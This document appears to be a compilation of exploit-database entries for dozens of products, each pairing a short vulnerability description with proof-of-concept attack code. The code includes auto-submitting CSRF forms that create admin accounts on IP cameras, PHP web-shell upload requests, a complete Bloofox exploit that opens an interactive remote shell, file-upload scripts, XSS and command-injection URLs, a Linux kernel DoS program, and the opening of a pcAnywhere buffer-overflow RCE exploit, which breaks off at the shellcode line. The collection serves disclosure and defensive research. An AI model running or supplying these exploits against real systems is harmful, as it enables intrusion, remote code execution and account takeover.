HireHackking

source: https://www.securityfocus.com/bid/60526/info Brickcom multiple IP cameras are prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected. <html> <body> <form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi"; method="POST"> <input type="hidden" name="action" value="add"> <input type="hidden" name="index" value="0"> <input type="hidden" name="username" value="test2"> <input type="hidden" name="password" value="test2"> <input type="hidden" name="privilege" value="1"> <script>document.gobap.submit();</script> </form> </body> </html>

Advisory ID: HTB23266 Product: Oxwall Vendor: http://www.oxwall.org Vulnerable Version(s): 1.7.4 and probably prior Tested Version: 1.7.4 Advisory Publication: July 1, 2015 [without technical details] Vendor Notification: July 1, 2015 Vendor Patch: September 8, 2015 Public Disclosure: October 22, 2015 Vulnerability Type: Cross-Site Request Forgery [CWE-352] CVE Reference: CVE-2015-5534 Risk Level: High CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in Oxwall, which can be exploited to perform CSRF (Cross-Site Request Forgery) attacks. An attacker might be able to put the website under maintenance and perform XSS attacks against website visitors. The vulnerability exists due to failure in the "/admin/pages/maintenance" script to properly verify the source of the HTTP request. A remote attacker can trick a logged-in administrator to visit a page with CSRF exploit and put the entire website under maintenance. Additionally, the attacker is able to inject arbitrary HTML and JavaScript code into maintenance message and execute it in browsers of any website visitor. Successful exploitation of this vulnerability may allow an attacker to steal other users’ cookies, spread malware to website visitors, and even obtain full control over vulnerable website. A simple CSRF exploit below puts the website under maintenance and displays a JS popup with "ImmuniWeb" word to every website visitor: <form action = "http://[host]/admin/pages/maintenance" method = "POST"> <input type="hidden" name="form_name" value="maintenance"> <input type="hidden" name="maintenance_enable" value="on"> <input type="hidden" name="save" value="Save"> <input type="hidden" name="maintenance_text" value="<script>alert('ImmuniWeb');</script>"> <input value="submit" id="btn" type="submit" /> </form> <script> document.getElementById('btn').click(); </script> ----------------------------------------------------------------------------------------------- Solution: Update to Oxwall 1.8 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23266 - https://www.htbridge.com/advisory/HTB23266 - Cross-Site Request Forgery on Oxwall. [2] Oxwall - http://www.oxwall.org/ - Oxwall® is unbelievably flexible and easy to use PHP/MySQL social networking software platform. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Source: https://code.google.com/p/google-security-research/issues/detail?id=483 Windows: NtCreateLowBoxToken Handle Capture Local DoS/Elevation of Privilege Platform: Windows 8.1 Update, Windows 10, Windows Server 2012 Class: Local Dos/Elevation of Privilege Summary: The NtCreateLowBoxToken API allows the capture of arbitrary handles which can lead to to local DoS or elevation of privilege. Description: The NtCreateLowBoxToken system call accepts an array of handles which are stored with the new token. This is presumably for maintaining references to the appcontainer specific object directories and symbolic links so that they do not need to be maintained anywhere else. The function, SepReferenceLowBoxObjects which captures the handles has a couple of issues which can lead to abuse: 1) It calls ZwDuplicateObject which means the API can capture kernel handles as well as user handles. 2) No checks are made on what object types the handles represent. The fact that kernel handles can be captured isn’t as bad as it could be. As far as I can tell there’s no way of getting the handles back. The second issue though is slightly more serious as it allows a user to create a reference cycle to kernel objects and potentially maintain them indefinitely, at least until a reboot. One way of doing this is to exploit the fact that threads can be assigned impersonation tokens. For example a new thread can be created and the handle to that thread captured inside the lowbox handle table. The resulting lowbox token can then be assigned as an impersonation token, the thread and token now maintain their references and the kernel objects survive the user logging out. As the thread references the process this also maintains the process object. Now at the point of logging out the process will be terminated but because the token maintains the reference cycle the process object itself will not go away. This can lead to a few results: 1) A user could open handles to important resources and files and prevent the handles getting released. This could ultimately result in a local DoS (although only something like a terminal server would be affected) and the administrator wouldn’t easily be able to fix it without rebooting as the process becomes hidden from typical task managers and trying to terminate it won’t help. 2) If a user logs out then back in again they can reopen the process (by PID or using NtGetNextProcess) and get access to the original process token which is still marked as having the original session ID (something which would normally require TCB privilege to change). This might be exploitable to elevate privileges in some scenarios. While the session object still exists in the kernel due to the reference cycle, it is dead so trying to create a process within that session will not work, however the user could release the reference cycle by clearing the thread’s impersonation token which will let session object be cleaned up and allow another user (again think terminal server) to login with that session ID. The user could then create a process in that session indirectly by impersonating the token and using something like the task scheduler. It isn’t immediately clear if the user would be able to access the session’s desktop/window station due to its DACL, but at the least references to the sessions object directory could be maintained (such as DosDevices) which might allow the user to redirect named resources for the user to themselves and get the privileges of the other user. This would be particularly serious if the other user was an administrator. Proof of Concept: I’ve provided a PoC which will cause the reference cycle and display the process if it can open one. The archive password is ‘password’. Follow these steps: 1) Extract the PoC to a location on a local hard disk which is writable by a normal user 2) Execute the poc executable file 3) The user should be automatically logged out 4) Log back in as the user 5) Execute poc again, it should now print out information about the stuck process and the extracted process token. Expected Result: It shouldn’t be possible to generate a kernel object reference cycle Observed Result: The reference cycle is created and the user can reopen the process. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38580.zip

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Pligg CMS 2.0.2 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://pligg.com/ Vulnerability Type: Code Execution & CSRF Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 10/07/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description The file editor provides the possibility to edit .tpl files stored in the templates directory. But the file editor is vulnerable to directory traversal when saving files, and it does not check the submitted filename against a whitelist of allowed files. It also does not check the file extension. Because of this, it is possible to gain code execution. Admin credentials are required to access the file editor, but the request does not have CSRF protection, so an attacker can gain code execution by getting the admin to visit a website they control while logged in. 3. Proof of Concept POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1 the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date 09/22/2015 Vendor replied, issue has been send to staff 09/29/2015 Reminded Vendor of disclosure date (no reply) 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html

source: https://www.securityfocus.com/bid/60529/info Sony CH and DH series IP cameras including SNCCH140, SNCCH180, SNCCH240, SNCCH280, SNCDH140, SNCDH140T, SNCDH180, SNCDH240, SNCDH240T, and SNCDH280 are prone to multiple cross-site request-forgery vulnerabilities. Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. <html> <body> <form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST"> <input type="Select" name="ViewerModeDefault" value="00000fff"> <input type="Hidden" name="ViewerAuthen" value="off"> <input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4="> <input type="Hidden" name="User1" value="xxxx,c0000fff"> <input type="Hidden" name="User2" value="xxxx,c0000fff"> <input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff"> <input type="Hidden" name="User4" value="Og==,00000fff"> <input type="Hidden" name="User5" value="Og==,00000fff"> <input type="Hidden" name="User6" value="Og==,00000fff"> <input type="Hidden" name="User7" value="Og==,00000fff"> <input type="Hidden" name="User8" value="Og==,00000fff"> <input type="Hidden" name="User9" value="Og==,00000fff"> <input type="Hidden" name="Reload" value="referer"> <script>document.SonyCsRf.submit();</script> </form> </body> </html>

source: https://www.securityfocus.com/bid/60533/info The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application. NextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected. #! /usr/bin/perl use LWP; use HTTP::Request::Common; my ($url, $file) = @ARGV; my $ua = LWP::UserAgent->new(); my $req = POST $url, Content_Type => 'form-data', Content => [. name => $name, galleryselect => 1, # Gallery ID, should exist Filedata => [ "$file", "file.gif", Content_Type => 'image/gif' ] ]; my $res = $ua->request( $req ); if( $res->is_success ) { print $res->content; } else { print $res->status_line, "\n"; }

source: https://www.securityfocus.com/bid/60566/info TaxiMonger for Android is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. TaxiMonger 2.6.2 and 2.3.3 are vulnerable; other versions may also be affected. <Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script>

source: https://www.securityfocus.com/bid/60585/info bloofoxCMS is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. bloofoxCMS 0.5.0 is vulnerable;other versions may also be affected. <?php /* ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' Exploit Title : Bloofox CMS Unrestricted File Upload Exploit Date : 17 June 2013 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://www.bloofox.com/ Software Link : http://jaist.dl.sourceforge.net/project/bloofox/bloofoxCMS/bloofoxCMS_0.5.0.7z Version : 0.5.0 Tested on : Window and Linux ##################################################### VULNERABILITY: Unrestricted File Upload ##################################################### This application has an upload feature that allows an authenticated user with Administrator roles or Editor roles to upload arbitrary files to media directory cause remote code execution by simply request it. ##################################################### EXPLOIT ##################################################### */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } if ($argc < 3) { print "\n==============================================\n"; print " Bloofox CMS Unrestricted File Upload Exploit \n"; print " \n"; print " Discovered By CWH Underground \n"; print "==============================================\n\n"; print " ,--^----------,--------,-----,-------^--, \n"; print " | ||||||||| `--------' | O \n"; print " `+---------------------------^----------| \n"; print " `\_,-------, _________________________| \n"; print " / XXXXXX /`| / \n"; print " / XXXXXX / `\ / \n"; print " / XXXXXX /\______( \n"; print " / XXXXXX / \n"; print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; print " (________( \n"; print " `------' \n\n"; print "\nUsage......: php $argv[0] <host> <path> <user> <password>\n"; print "\nExample....: php $argv[0] target /bloofoxcms/ editor editor\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "username={$argv[3]}&password={$argv[4]}&action=login"; $packet = "POST {$path}admin/index.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Referer: {$host}{$path}admin/index.php\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; $response = http_send($host, $packet); if (!preg_match("/Location: index.php/i", $response)) die("\n[-] Login failed!\n"); if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n"); print "\n..:: Login Successful ::..\n"; print "\n..:: Waiting hell ::..\n\n"; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"filename\"; filename=\"sh.php\"\r\n"; $payload .= "Content-Type: application/octet-stream\r\n\r\n"; $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n"; $payload .= "--o0oOo0o--\r\n"; $packet = "POST {$path}admin/index.php?mode=content&page=media&action=new HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Referer: {$host}{$path}admin/index.php?mode=content&page=media&action=new\r\n"; $packet .= "Cookie: {$sid[1]}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet = "GET {$path}media/files/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nBloofox-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?>

source: https://www.securityfocus.com/bid/60532/info Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. http://www.example.com/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0

source: https://www.securityfocus.com/bid/60569/info The Mandril Security plugin for Monkey HTTP Daemon is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions, which may aid in launching further attacks http://www.example.com/%2ftest/

/* source: https://www.securityfocus.com/bid/60586/info The Linux Kernel is prone to a local denial-of-service vulnerability. Local attackers can exploit this issue to trigger an infinite loop which may cause denial-of-service conditions. */ /* ** PoC - kernel <= 3.10 CPU Thread consumption in ext4 support. (Infinite loop) ** Jonathan Salwan - 2013-06-05 */ #include <errno.h> #include <fcntl.h> #include <linux/fs.h> #include <stdio.h> #include <sys/ioctl.h> #include <sys/stat.h> #include <sys/types.h> struct ext4_new_group_input { __u32 group; __u64 block_bitmap; __u64 inode_bitmap; __u64 inode_table; __u32 blocks_count; __u16 reserved_blocks; __u16 unused; }; #define EXT4_IOC_GROUP_ADD _IOW('f', 8, struct ext4_new_group_input) int main(int ac, const char *av[]){ struct ext4_new_group_input input; int fd; if (ac < 2){ printf("Syntax : %s <ext4 device>\n", av[0]); printf("Example : %s /tmp\n", av[0]); return -1; } printf("[+] Opening the ext4 device\n"); if ((fd = open(av[1], O_RDONLY)) < 0){ perror("[-] open"); return -1; } printf("[+] Trigger the infinite loop\n"); input.group = -1; if (ioctl(fd, EXT4_IOC_GROUP_ADD, &input) < 0){ perror("[-] ioctl"); } close(fd); return 0; }

source: https://www.securityfocus.com/bid/60690/info The RokDownloads component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. <?php $uploadfile="Amir.php.gif"; $ch = curl_init("http://www.exemple.com/administrator/components/com_rokdownloads/assets/uploadhandler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>

source: https://www.securityfocus.com/bid/60760/info FtpLocate is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. FtpLocate 2.02 is vulnerable; other versions may also be affected. http://www.example.com/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script>

source: https://www.securityfocus.com/bid/60682/info TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions and obtain sensitive information which may aid in further attacks. http://drupal.org/node/207891 import telnetlib import sys host = sys.argv[1] tn = telnetlib.Telnet(host) tn.read_until("Password:") tn.write("\r\n") tn.read_until("choice") tn.write("1\r\n") tn.read_until("choice") tn.write("1\r\n") data = tn.read_until("choice") for i in data.split("\r\n"): if "Device Name" in i: print i.strip() if "Node ID" in i: print i.strip() tn.write("0\r\n") tn.read_until("choice") tn.write("2\r\n") data = tn.read_until("choice") for i in data.split("\r\n"): if "Manufacture:" in i: print i.strip() if "Model:" in i: print i.strip() tn.write("0\r\n") tn.read_until("choice") tn.write("5\r\n") data = tn.read_until("choice") for i in data.split("\r\n"): if "Community" in i: print i.strip()

source: https://www.securityfocus.com/bid/60660/info et-chat is prone to a privilege-escalation vulnerability and an arbitrary shell-upload vulnerability. An attacker can exploit these issues to gain elevated privileges within the application and upload arbitrary shells; this can result in an arbitrary code execution within the context of the vulnerable application. et-chat 3.07 is vulnerable; other versions may also be affected. http://www.example.com/chat/?AdminRegUserEdit&admin&id=4

source: https://www.securityfocus.com/bid/60794/info Oracle VM VirtualBox is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause the host system's network to become unusable, resulting in denial-of-service condition. VirtualBox 4.2.12 is affected; other versions may also be vulnerable. tracepath 8.8.8.8

source: https://www.securityfocus.com/bid/60782/info Barnraiser Prairie is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to access arbitrary images in the context of the application. This may aid in further attacks. http://www.example.com/get_file.php?avatar=..&width=../../../../../../../../usr/share/apache2/icons/apache_pb.png

source: https://www.securityfocus.com/bid/60795/info Xaraya is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Xaraya 2.4.0-b1 is vulnerable; other versions may also be affected. http://www.example.com/index.php?func=modinfonew&id=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&module=modules&type=admin http://www.example.com/index.php?block_id=7&func=modify_instance&interface=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&module=blocks&tab=config&type=admin http://www.example.com/index.php?func=aliases&module=modules&name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&type=admin http://www.example.com/index.php?func=assignprivileges&module=privileges&tab=authsystem&tabmodule=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3

source: https://www.securityfocus.com/bid/60818/info Motion is prone to multiple security vulnerabilities including multiple buffer-overflow vulnerabilities, a cross-site scripting vulnerability and a cross-site request-forgery vulnerability. An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, execute arbitrary code, and cause denial-of-service conditions. Other attacks may also be possible. Motion 3.2.12 is vulnerable; other versions may also be affected. Buffer-overflow: # motion -c `python -c 'print "\x41"*1000'` [0] Configfile AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA not fou: Segmentation fault # motion -p /tmp/`python -c 'print "\x41"*5000'` Segmentation fault Cross-site scripting: http://www.example.com <IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li> Cross-site request forgery: http://www.example.com/0/config/set?control_authentication=admin:mypassword (Set admin password) http://www.example.com/0/config/set?sql_query=SELECT%20user() (Arbitrary SQL query)

source: https://www.securityfocus.com/bid/60826/info ZamFoo is prone to a remote command-injection vulnerability. Attackers can exploit this issue to execute arbitrary commands in the context of the application. ZamFoo 12.0 is vulnerable; other versions may also be affected. http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command`

 actiTIME 2015.2 Multiple Vulnerabilities Vendor: Actimind, Inc. Product web page: http://www.actitime.com Affected version: 2015.2 (Small Team Edition) Summary: actiTIME is a web timesheet software. It allows you to enter time spent on different work assignments, register time offs and sick leaves, and then create detailed reports covering almost any management or accounting needs. Desc: The application suffers from multiple security vulnerabilities including: Open Redirection, HTTP Response Splitting and Unquoted Service Path Elevation Of Privilege. Tested on: OS/Platform: Windows 7 6.1 for x86 Servlet Container: Jetty/5.1.4 Servlet API Version: 2.4 Java: 1.7.0_76-b13 Database: MySQL 5.1.72-community-log Driver: MySQL-AB JDBC Driver mysql-connector-java-5.1.13 Patch level: 28.0 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5273 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5273.php 13.10.2015 -- 1. Open Redirect ----------------- http://localhost/administration/settings.do?redirectUrl=http://zeroscience.mk&submitted=1 2. HTTP Response Splitting --------------------------- http://localhost/administration/settings.do?redirectUrl=%0a%0dServer%3a%20Waddup%2f2%2e0&submitted=1 Response: HTTP/1.1 302 Moved Temporarily Date: Wed, 14 Oct 2015 09:32:05 GMT Server: Jetty/5.1.4 (Windows 7/6.1 x86 java/1.7.0_76 Content-Type: text/html;charset=UTF-8 Cache-Control: no-store, no-cache Pragma: no-cache Expires: Tue, 09 Sep 2014 09:32:05 GMT X-UA-Compatible: IE=Edge Location: http://localhost/administration/ Server: Waddup/2.0 Content-Length: 0 3. Unquoted Service Path Elevation Of Privilege ------------------------------------------------ C:\Users\joxy>sc qc actiTIME [SC] QueryServiceConfig SUCCESS SERVICE_NAME: actiTIME TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\actiTIME\actitime_access.exe startAsService LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : actiTIME Server DEPENDENCIES : actiTIME MySQL SERVICE_START_NAME : LocalSystem

#!/usr/bin/python ################################################################ # Exploit Title: Symantec pcAnywhere v12.5.0 Windows x86 RCE # Date: 2015-10-31 # Exploit Author: Tomislav Paskalev # Vendor Homepage: https://www.symantec.com/ # Software Link: http://esdownload.symantec.com/akdlm/CD/MTV/pcAnywhere_12_5_MarketingTrialware.exe # Version: Symantec pcAnywhere v12.5.0 Build 442 (Trial) # Vulnerable Software: # Symantec pcAnywhere 12.5.x through 12.5.3 # Symantec IT Management Suite pcAnywhere Solution 7.0 (aka 12.5.x) and 7.1 (aka 12.6.x) # Tested on: # Symantec pcAnywhere v12.5.0 Build 442 (Trial) # -------------------------------------------- # Microsoft Windows Vista Ultimate SP1 x86 EN # Microsoft Windows Vista Ultimate SP2 x86 EN # Microsoft Windows 2008 Enterprise SP2 x86 EN # Microsoft Windows 7 Professional SP1 x86 EN # Microsoft Windows 7 Ultimate SP1 x86 EN # CVE ID: 2011-3478 # OSVDB-ID: 78532 ################################################################ # Vulnerability description: # The application's module used for handling incoming connections # (awhost32.exe) contains a flaw. When handling authentication # requests, the vulnerable process copies user provided input # to a fixed length buffer without performing a length check. # A remote unauthenticated attacker can exploit this vulnerability # to cause a buffer overflow and execute arbitrary code in the # context of the exploited application (installed as a service # by default, i.e. with "NT AUTHORITY\SYSTEM" privileges). ################################################################ # Target application notes: # - the application processes one login attempt at a time # (i.e. multiple parallel login requests are not possible) # - available modules (interesting exploit wise): # Name | Rebase | SafeSEH | ASLR | NXCompat | OS Dll # ------------------------------------------------------------- # awhost32.exe | False | False | False | False | False # ijl20.dll | False | False | False | False | False # IMPLODE.DLL | False | False | False | False | False # ------------------------------------------------------------- # - supported Windows x86 operating systems (pcAnywhere v12.5) # - Windows 2000 # - Windows 2003 Server # - Windows 2008 Server # - Windows XP # - Windows Vista # - Windows 7 ################################################################ # Exploit notes: # - bad characters: "\x00" # - Windows Vista, Windows 2008 Server, Windows 7 # - after a shellcode execution event occurs, the # application does not crash and remains fully functional # - one successful shellcode execution event has a low # success rate (applies to all OSes) # - in order to achieve an overall more reliable exploit, # multiple shellcode executions need to be performed # (until the shellcode is successfully executed) # - brute force is a feasible method # - multiple parallel brute force attacks are not possible # - multiple valid offsets are available (i.e. not just the # ones tested) ################################################################ # Test notes: # - all tested OSes # - clean default installations # - all OS specific statistics referenced in the exploit are # based on the test results of 10 attempts per tested offset # - all attempts were performed after a system reboot (VM) # - the provided test results should be taken only as a rough guide # - in practice it might occur that the number of attempts # needed to achieve successful exploitation is (much) # higher than the maximum value contained in the test # results, or that the exploit does not succeed at all # - other (untested) offsets might provide better results # - not letting the OS and application load fully/properly before # starting the exploit may lead to failed exploitation (this # observation was made during the testing of the exploit and # applies mostly to Windows 7) ################################################################ # Patch: # https://support.symantec.com/en_US/article.TECH179526.html # https://support.norton.com/sp/en/us/home/current/solutions/v78694006_EndUserProfile_en_us ################################################################ # Thanks to: # Tal zeltzer (discovered the vulnerability) # S2 Crew (Python PoC) ################################################################ # In memoriam: # msfpayload | msfencode [2005 - 2015] ################################################################ # References: # http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3478 # http://www.zerodayinitiative.com/advisories/ZDI-12-018/ # https://www.exploit-db.com/exploits/19407/ ################################################################ import socket import time import struct import string import sys ################################ ### HARDCODED TARGET INFO ### ################################ # target server info # >>> MODIFY THIS >>> targetServer = "192.168.80.227" targetPort = 5631 # Supported operating systems vistaUltSP1 = { 'Version': 'Microsoft Windows Vista Ultimate SP1 x86 EN', 'Offset': 0x03e60000, 'PasswordStringLength': 3500, 'TestAttempts': [8, 62, 35, 13, 8, 7, 11, 23, 8, 10] }; vistaUltSP2 = { 'Version': 'Microsoft Windows Vista Ultimate SP2 x86 EN', 'Offset': 0x03e60000, 'PasswordStringLength': 3500, 'TestAttempts': [16, 27, 13, 17, 4, 13, 7, 9, 5, 16] }; s2k8EntSP2 = { 'Version': 'Microsoft Windows 2008 Enterprise SP2 x86 EN', 'Offset': 0x03dd0000, 'PasswordStringLength': 3500, 'TestAttempts': [25, 5, 14, 18, 66, 7, 8, 4, 4, 24] }; sevenProSP1 = { 'Version': 'Microsoft Windows 7 Professional SP1 x86 EN', 'Offset': 0x03a70000, 'PasswordStringLength': 3500, 'TestAttempts': [188, 65, 25, 191, 268, 61, 127, 136, 18, 98] }; sevenUltSP1 = { 'Version': 'Microsoft Windows 7 Ultimate SP1 x86 EN', 'Offset': 0x03fa0000, 'PasswordStringLength': 3500, 'TestAttempts': [23, 49, 98, 28, 4, 31, 4, 42, 50, 42] }; # target server OS # >>> MODIFY THIS >>> #OSdictionary = vistaUltSP1 #OSdictionary = vistaUltSP2 #OSdictionary = s2k8EntSP2 #OSdictionary = sevenProSP1 OSdictionary = sevenUltSP1 # timeout values shellcodeExecutionTimeout = 30 # client-server handshake initialisationSequence = "\x00\x00\x00\x00" handshakeSequence = "\x0d\x06\xfe" # username string usernameString = "U" * 175 # shellcode # available shellcode space: 1289 bytes # shellcode generated with Metasploit Framework Version: 4.11.4-2015090201 (Kali 2.0) # msfvenom -a x86 